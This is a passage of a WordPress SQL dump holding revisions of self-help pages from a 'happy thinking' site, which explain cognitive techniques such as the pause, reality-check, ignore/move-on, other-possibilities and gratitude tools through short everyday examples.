-->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/forgetting-gratitude/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Negative core beliefs', '', 'inherit', 'closed', 'closed', '', '1632-revision-v1', '', '', '2023-06-06 08:26:30', '2023-06-06 08:26:30', '', 1632, 'https://www.happythinking.com/?p=1736', 0, 'revision', '', 0),
(1738, 1, '2023-06-06 08:29:28', '2023-06-06 08:29:28', '<!-- wp:paragraph -->\n<p>In the past sections, we went through common unhelpful thinking patterns that can contribute to one being unhappy. Now that you understand these unhelpful thinking patterns you will be able to recognise such thinking when it happens in your own mind. However, while recognition itself might make you feel better, the real changes will only come when you are able to change unhelpful thinking patterns into more helpful thinking patterns.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It would have been wonderful if there was a magical brain surgeon who could magically rewire our brains so that we would be able to think in more helpful ways. Unfortunately, such magical surgeons do not exist, and I doubt something like that would be even possible in our lifetime. While scientific understanding of how our brains work has progressed hugely, we still know very little and there is a long way to go before seeing exactly how â€œthinkingâ€ happens. However, luckily for us, the human mind has an amazing power, which is the power to heal itself. Our minds have the ability to analyse our thoughts and change themselves.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how can oneâ€™s mind change itself? This one can be done using â€œtoolsâ€, something like how a car mechanic would use various tools to fix a car not running well. Of course, the tools one can use on the mind are not made of metal, but rather are made of psychological techniques that one can use to change how one thinks. In the next sections of this website, I will share with you these psychological tools which you can use to change your thinking into ways that promote happiness in you (i.e. Happy Thinking!).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some of the psychological tools will help you better detect when you are thinking in unhelpful ways. i.e. you will become more â€œsensitiveâ€ in detecting unhelpful thinking when it happens in your mind. Other tools will help you to change unhelpful thinking into helpful thinking.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some tools will be more useful to use right at the moment that you detect unhelpful thinking patterns in your mind, whereas other tools will be more useful at times when you are able to reflect on how you were thinking on the day. i.e. some tools are â€œimmediate useâ€ tools whereas others are â€œuse laterâ€ tools, to be used when you are relaxed.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When an engineer uses tools to fix a machine, they have to choose the correct tool. Not all tools will be useful to repair a given fault. Also, sometimes, a fault will need multiple tools to be used together. The use of psychological tools is no different. You will need to try various tools to see which one works for you. And also, you may well need to use more than one tool at the same time.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>You may find that some of the psychological tools may appear to be â€œsimpleâ€, and this may put you off. Do not confuse simple as being the same as being â€œineffectiveâ€! Many solutions in life do not have to be complex, and the key is to try and judge for yourself how useful or not useful something is. Do not prejudge, rather, give the tools a chance before putting them away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Unhelpful thinking patterns can develop over many years and get entrenched into oneâ€™s mind, making oneâ€™s mind resist change. In the next sections of this website, you will embark on learning about the various psychological tools that I will share with you. As you start your journey, remember to open up your mind to change.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/forgetting-gratitude/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/inner-voice/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Psychological tools', '', 'inherit', 'closed', 'closed', '', '1641-revision-v1', '', '', '2023-06-06 08:29:28', '2023-06-06 08:29:28', '', 1641, 'https://www.happythinking.com/?p=1738', 0, 'revision', '', 0),
(1739, 1, '2023-06-06 08:31:05', '2023-06-06 08:31:05', '<!-- wp:paragraph -->\n<p>Happy thinking is about dealing with unhelpful thoughts using â€œtoolsâ€. However, the tools one uses to deal with oneâ€™s mind are obviously not real metal tools like what a mechanic might use! One cannot open up oneâ€™s skull to work on oneâ€™s mind (please do not try!). Luckily a more practical option is however available to all of us, and that is to use oneâ€™s inner voice to â€œtalkâ€ to oneâ€™s mind. This is not as strange as you may imagine. Everyone has an inner voice, which in some can be quite obvious whereas in others it may stay mostly in the background. One may â€œhearâ€ oneâ€™s inner voice when one reads. Perhaps you can hear your inner voice right now as you read this very sentence!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Many tools in happy thinking will make use of oneâ€™s inner voice to deal with thoughts. Itâ€™s sort of like talking to oneself, but doing so inside oneâ€™s mind rather than speaking words out loud. Oneâ€™s inner voice, even though silent to those around oneself, is actually a very powerful force to deal with unhelpful thoughts. In some sense, a lot of unhappiness is due to people not talking to themselves! One may talk to hundreds of people, and yet forget to talk to oneself.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/psychological-tools/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/pause-tool/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Inner voice', '', 'inherit', 'closed', 'closed', '', '1646-revision-v1', '', '', '2023-06-06 08:31:05', '2023-06-06 08:31:05', '', 1646, 'https://www.happythinking.com/?p=1739', 0, 'revision', '', 0),
(1740, 1, '2023-06-06 08:32:22', '2023-06-06 08:32:22', '<!-- wp:paragraph -->\n<p>In our minds, various thoughts appear and quickly spread into different areas. These thoughts may be helpful thoughts or unhelpful thoughts, and happy thinking is about applying tools to deal with the unhelpful ones. However, it would be very difficult to meaningfully interact with such â€œspeedingâ€ thoughts. To engage with a thought, one needs to first pause it so that it can â€œhearâ€ you. It''s a bit like when a child is crazily running around in a room, to speak to the child meaningfully, one will first need the child to cease running and become still. In the case of the child, you may shout her name loudly, â€œShelly!â€,&nbsp; and this would, at least briefly, make her pause her running around. Once you get her attention, you may be able to engage with her, â€œShelly, itâ€™s time for dinner!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So how can one get the attention of a thought that is speeding along? The answer is to use oneâ€™s inner voice. As soon as one senses an unhelpful thought occurring in oneâ€™s mind, one can use oneâ€™s internal voice to say as strongly as possible, â€œPause!â€ What this does is to temporarily â€œfreezeâ€ the thought, so that oneâ€™s mind can engage with it before it continues to cause more unhelpful thoughts to be generated.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let me explain this concept using an example. Letâ€™s imagine that a person, who we will call Jay, is a very anxious person and he is at his home waiting for his partner to return from work. He looks at the clock and notices that it''s ten minutes past the time that his partner normally returns home from work. Imagine that at this point, Jayâ€™s mind generates the following unhelpful thought, â€œShe must have met with a horrendous road traffic accident.â€ At this point, this thought is unhelpful because there is no information to say that an accident has actually happened, and there are so many other less serious options such as being stuck in traffic. Jayâ€™s mind is simply â€œassumingâ€ that an accident has happened, when actually, at this point there is no information to support that thought. So at this point, Jayâ€™s incorrect assumption is making him unnecessarily worry. Jay is aware that he suffers from anxiety and he has some suspicions that his thoughts are probably unhelpful. So his first step is to pause the thought, and he does this by using his internal voice and saying to his mind, â€œpauseâ€. This will briefly pause his unhelpful thought, â€œShe must have met with a horrendous road traffic accident.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Now if this all that had to be done for unhelpful thoughts, i.e. just saying â€œpauseâ€, wouldnâ€™t that be great? A few â€œpausesâ€ and everything would be fine! As you have probably guessed, there are a few more steps needed. That is, once an unhelpful thought has been paused, one will need to use a few other simple tools to deal with the thought, and I will explain those tools in subsequent sections of this website.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Some of you may think, â€œWhy not use the word â€˜stopâ€™ instead of the word â€˜pauseâ€™, as the former is a much more commanding word?â€ The reason is, perhaps like humans, thoughts do not â€˜likeâ€™ to follow orders! Let me demonstrate this using a simple psychological experiment that we can do right now. Are you ready? Ok. I am going to give you a super easy task now. For this task, you do not even have to move a finger! Here is your task: â€œPlease DO NOT think of a white rabbit.â€ I am sure you will agree that it is quite an easy task, where all I have asked you to do is not think of a white rabbit. However, I am quite sure that most of you would have failed this simple task and would have thought, at least briefly and vaguely, of a white rabbit! This is a very common finding and highlights how telling your thoughts to go away (e.g. â€œby saying stopâ€) does not work, and even can have the opposite effect. That is why I named this tool the â€œpause toolâ€ rather than naming it the â€œstop toolâ€.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The pause tool may appear simplistic, but once you combine it with the other tools that I will explain to you later, you will realise that it is actually quite powerful. The aim of the pause tool is to simply hold an unhelpful thought just long enough for other tools to engage with it. Donâ€™t underestimate the power of your inner voice!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/inner-voice/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/reality-check-tool/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Pause tool', '', 'inherit', 'closed', 'closed', '', '1650-revision-v1', '', '', '2023-06-06 08:32:22', '2023-06-06 08:32:22', '', 1650, 'https://www.happythinking.com/?p=1740', 0, 'revision', '', 0),
(1741, 1, '2023-06-06 08:33:47', '2023-06-06 08:33:47', '<!-- wp:paragraph -->\n<p>As you know by now, the main aim of happy thinking is to help one deal with unhelpful thinking patterns. A common feature of unhelpful thinking patterns is that often they are unhelpful because they distort reality. That is, such thoughts are based more on what one â€œimaginesâ€ the truth to be rather than what the truth actually is.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For a moment, letâ€™s assume that you are a judge in a court of law and that there is a person in front of you who has been accused of stealing a cake (I suppose it''s not the most serious of crimes, but this is only an example!). Now as a good and professional judge, it would be crazy for you to tell the accused, â€œHey, I â€˜imagineâ€™ that you must have stolen that cake, and therefore I declare that you are guilty.â€ There would be an uproar in the court because one needs to judge someone based on evidence rather than mere imagination. Unfortunately, oneâ€™s mind can often rely on imagination rather than facts, and this can cause one to have a lot of unnecessary distress. People often make the mistake of assuming that their thoughts accurately represent reality, when actually, they often may not. This is where a tool which I call the â€œreality check toolâ€, can be very useful. With this tool, after using the pause tool to â€œpauseâ€ the unhelpful thought, one asks oneâ€™s mind, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ Let us continue with our example from the previous section, where Jayâ€™s partner was only ten minutes late returning home from work and he was having the unhelpful thought, â€œShe must have met with a terrible road traffic accidentâ€. Jay first uses the â€œpause toolâ€ where he uses his internal voice and says â€œpauseâ€ to himself.&nbsp; He then applies the reality check tool to the paused thought, and asks himself, â€œWhat actual evidence do I have that supports my thought that my partner has had a terrible road traffic accident?â€. As Jay looks for evidence, he realises that he actually does not have any evidence that his partner has met with a road traffic accident. There are no phone calls or messages, no news reports, etc at this point to indicate that something awful has happened. Rather, he realises that he has â€œimaginedâ€ a thought with the worst outcome rather than having an evidence-based thought. With this realisation, Jayâ€™s unhelpful thought dies away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>This is not to say that Jayâ€™s thought was utterly unrealistic as after all road traffic accidents do happen. Rather, the issue is that Jayâ€™s imagination was assuming the worst before there was actual evidence to support that view. The imagined unhelpful thought would have caused him to have unnecessary worry and possibly even panic, before being at all certain that such worry was warranted. In fact, to highlight this, letâ€™s make our example have a happy ending. Soon after Jay uses the reality check tool, his partner walks through the door five minutes later, saying, â€œGosh there was so much traffic on the roads today!â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the reality check tool, one must take care to only look for genuine evidence that could justify the unhelpful thought and avoid the temptation to â€œimagineâ€ evidence (i.e. fake evidence!). This can happen if oneâ€™s mind is desperate to prove that the unhelpful thinking is true. When using the reality check tool, it would of course be useless to compare imaginary evidence Vs imagination!&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So in summary, the reality check tool is about asking, â€œHow much of this thought is based on real evidence and how much of this thought is based on imagination.â€ One will find that with unhelpful thoughts, there will be little or no evidence to support it. Once one realises that, the unhelpful thought should fade away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/pause-tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/ignore-move-on-tool/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Reality check tool', '', 'inherit', 'closed', 'closed', '', '1655-revision-v1', '', '', '2023-06-06 08:33:47', '2023-06-06 08:33:47', '', 1655, 'https://www.happythinking.com/?p=1741', 0, 'revision', '', 0),
(1742, 1, '2023-06-06 08:35:23', '2023-06-06 08:35:23', '<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In the previous section, you learnt about the â€œreality checkâ€ tool. When using that tool, most of the time, one will find that when looking for evidence to support the unhelpful thought, that thought just disappears, almost as if that thought realises on its own that it is no longer valid. However, sometimes one may find that even though one has shown that there is little evidence to support an unhelpful thought, that thought may still â€œhang aroundâ€. If this were to happen, it is crucial that one does not â€œpushâ€ the unhelpful thought away. As I explained to you when describing the pause tool, trying to stop or push away a thought can actually have the opposite effect, where the thought comes back even more. A much better option is to let the thought hang around as much as it likes, but crucially, since one knows that the thought is not valid, one can just ignore it. â€œIgnoringâ€ means that even though the thought is present, one does not react to it. One does not react to the thought because one knows, by using the reality check tool, that the unhelpful thought does not represent reality. Ultimately a thought that one does not react to will disappear, just like if one does not react to a friend, that friend will soon get bored and will leave!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>A very effective way to help ignore a thought is to add another step, which I call â€œMove onâ€. Essentially, after one decides to ignore a thought, one moves oneâ€™s mindâ€™s attention onto something else. Let me explain using the example we used in the previous sections, where Jayâ€™s partner was a bit late returning home from work. You will note that one can often use multiple combinations of tools together. This is sort of like how a mechanic will often use more than one tool when repairing a machine.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>So putting all this together, let''s see an example of the â€œIgnore/ Move onâ€ tool in use.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>We start with Jayâ€™s partner not being home 10 minutes past the usual time she normally returns home from work. Jay has the unhelpful thought, â€œShe must have had a terrible road traffic accidentâ€. Jay then uses the â€œpause toolâ€ where he uses his internal voice and says â€œpauseâ€ to himself. He then applies the reality check tool to the paused thought, and asks himself, â€œWhat actual evidence do I have that supports my thought that my partner has had a terrible road traffic accident?â€. As Jay looks for evidence, he realises that he actually does not have any evidence that his partner has met with a road traffic accident. Since he still has the unhelpful thought lingering in the background of his mind, he decides to use the ignore &amp; move on tool. Using his internal voice, he says to himself â€œIgnore and Move onâ€. He doesnâ€™t react to the unhelpful thinking and lets it be. He then moves on to a different thought, which on this occasion happens to be thinking of what he will be cooking for dinner. Eventually, Jayâ€™s unhelpful thinking fades away, avoiding him having unnecessary distress.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As I tell you about these tools, you may think they are complex. In reality, they are very easy to do in practice. The tools may appear to be â€œlengthyâ€, but that is only because I am breaking them down into individual steps. While it may take you a while to read and understand the tools, actually using the tools will take you much less time. And of course, like everything, with a bit of practice, it will only get quicker.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/reality-check-tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/other-possibilities-tool/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'Ignore / Move on tool', '', 'inherit', 'closed', 'closed', '', '1658-revision-v1', '', '', '2023-06-06 08:35:23', '2023-06-06 08:35:23', '', 1658, 'https://www.happythinking.com/?p=1742', 0, 'revision', '', 0),
(1743, 1, '2023-06-06 08:37:36', '2023-06-06 08:37:36', '<!-- wp:paragraph -->\n<p>As you know, much unhelpful thinking is about seeing things in a way that does not represent reality. The â€œreality checkâ€ tool that we discussed before works by one not finding evidence to back up unhelpful thoughts. Here, I will describe another approach you can take, which is by using what I call the â€œother possibilitiesâ€ tool. This would be best understood with the use of an example.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Let us imagine that Sally and her good friend Rupa are working in an office. One day, as Sally and Rupa see each other for the first time in the morning, Rupa doesnâ€™t smile and even appears to ignore Sally. Sally immediately jumps to the conclusion, â€œRupa must be angry with me.â€ For the rest of the morning, Sally is in a distressed state, trying to work out why Rupa must be angry with her. This goes on till lunchtime when Sally sees Rupa again. This time, Rupa smiles broadly and says, â€œThis morning was so stressful. My boss had wanted me to do some calculations for him, and I had worked on it all weekend on my laptop. Yet this morning, the document with all the calculations seemed to have gone missing from my laptop and I was so terrified about going to the meeting. Luckily, at the meeting, there was this guy who is really good with computers and he somehow located the missing document, and whew, everything was fine after that!â€&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you can see, in this example, Sally had unnecessarily suffered a whole morning because of the unhelpful thought, â€œRupa must be angry with meâ€, which did not match the reality of the situation. Let us now imagine a different direction this scenario could have taken. Let us start with Sally having the thought, â€œRupa must be angry with me.â€ Sally then says â€œpauseâ€ to herself to still the thought. At this point, she asks herself, â€œWhat other possibilities are there for Rupa not smiling at me?â€. Asking this question forces Sally to think of other possibilities and she thinks to herself, â€œMaybe Rupa is suffering from migraine like she sometimes does, or maybe she is stressed about some work issue or maybe she had a tiring morning coming to work.â€ This â€œthinking of other possibilitiesâ€ makes Sally realise that the original thought that she had is not the only possible thought. In other words, there is a good chance that the thought, â€œRupa is angry with me, may not even be correct, as there are other thoughts that also could be correct.â€ In this way, the â€œother possibilitiesâ€ tool can reduce the â€œpowerâ€ of the original unhelpful thought. As Sally decides to ignore the unhelpful thought and move on to doing her office tasks, it will soon fade away.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As the above example shows, by finding other possible thoughts, one can see things in a more â€œbalancedâ€ way, instead of focusing oneâ€™s attention only on one fixed and potentially inaccurate thought.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:buttons {"layout":{"type":"flex","justifyContent":"center","orientation":"horizontal"}} -->\n<div class="wp-block-buttons"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/ignore-move-on-tool/" style="border-radius:15px">Prev</a></div>\n<!-- /wp:button -->\n\n<!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}},"className":"is-style-fill"} -->\n<div class="wp-block-button is-style-fill"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/gratitude-tool/" style="border-radius:15px">Next</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"20px"} -->\n<div style="height:20px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:buttons {"align":"wide","layout":{"type":"flex","justifyContent":"center"}} -->\n<div class="wp-block-buttons alignwide"><!-- wp:button {"textAlign":"center","style":{"border":{"radius":"15px"}}} -->\n<div class="wp-block-button"><a class="wp-block-button__link has-text-align-center wp-element-button" href="https://www.happythinking.com/" style="border-radius:15px">Home</a></div>\n<!-- /wp:button --></div>\n<!-- /wp:buttons -->\n\n<!-- wp:spacer {"height":"30px"} -->\n<div style="height:30px" aria-hidden="true" class="wp-block-spacer"></div>\n<!-- /wp:spacer -->', 'â€œOther possibilitiesâ€ tool', '', 'inherit', 'closed', 'closed', '', '1661-revision-v1', '', '', '2023-06-06 08:37:36', '2023-06-06 08:37:36', '', 1661, 'https://www.happythinking.com/?p=1743', 0, 'revision', '', 0),
(1744, 1, '2023-06-06 08:38:49', '2023-06-06 08:38:49', '<!-- wp:paragraph -->\n<p>There is a very simple tool that can be used to help one to be happy, and that is the act of being â€œgratefulâ€. Studies have shown that being thankful (i.e. gratitude) helps to improve oneâ€™s mental health. The gratitude tool is about developing a habit of being grateful.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Often, especially when things are not great, it is easy to think that there is nothing to be grateful for. Perhaps this is because our minds tend to ignore positive aspects of our lives and instead, focus only on negatives. When one looks for things to be grateful for, one should not only focus on â€œbigâ€ things. While of course, one should not ignore big things, it is also important to actively look for â€œsmallâ€ things as well. Let me give you an example. Imagine that a person, who we will call Mark, has severe arthritis that limits his mobility and makes it difficult for him to venture out of his house. However, on this day, he does manage to go for a short walk up and down the street he lives in. That evening, as part of the â€œgratitude toolâ€ that he uses every day, Mark thinks of things to be grateful for. He tells himself, â€œToday I am grateful that I was able to walk up and down my street and was able to enjoy the outdoors a little bit. Another thing that I am grateful for is the phone call that my friend Sam made to me. It was great chatting with him and it made me feel better.â€</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>As you may have noticed in the example, the things that one can be grateful for don''t have to be major. Just a few everyday things can work as well. Initially, one may need to spend some extra effort looking for things to be grateful for, as oneâ€™s mind may have gotten used to ignoring such things. One could even choose very simple things like being grateful for the person smiling at you at the supermarket.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the gratitude tool, try to be a bit creative. One doesnâ€™t have to always choose the same things every day, such as, â€œI am grateful for my loving family.â€ If one keeps saying the same things every day (e.g. loving family), then oneâ€™s mind may not â€œlearnâ€ how to look for things to be grateful for. One can instead, try to look for different small things every day to be grateful for.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, when looking for things to be grateful for, there are a few things you need to be careful about. One should not excessively focus on being grateful to people who one may feel under obligation to, either emotionally or materially (e.g. someone who has lent one money). I am not saying that one should not acknowledge such persons. But excessively doing so may bring oneâ€™s mood down, as one may feel constantly indebted to those people and develop a sense of being helpless. It''s also important to not let the gratitude tool be about being happy about others'' misfortunes. (e.g. â€œAt least I am not as poor as my neighbour, Mary.â€). That would make the gratitude tool a negative exercise. Rather, one should just be grateful for good things that have happened to oneself without comparing them to those less fortunate than oneself.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When using the gratitude tool, most people will use their â€œinner voiceâ€ to express their gratitude. However, some might find it useful to write these thoughts in a notebook or diary (â€œgratitude journalâ€). At times, one might even be able to directly express gratitude to someone (e.g. â€œThank you for visiting me, you made me feel better.â€)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Remembering to be grateful can be a challenge and one may need to develop a way of reminding oneself to be grateful. Perhaps, for example, one can put a daily reminder on oneâ€™s phone diary, to remind oneself every day, at a convenient time, to be grateful, perhaps with a screen message, â€œGrateful Tool time!â€. Another 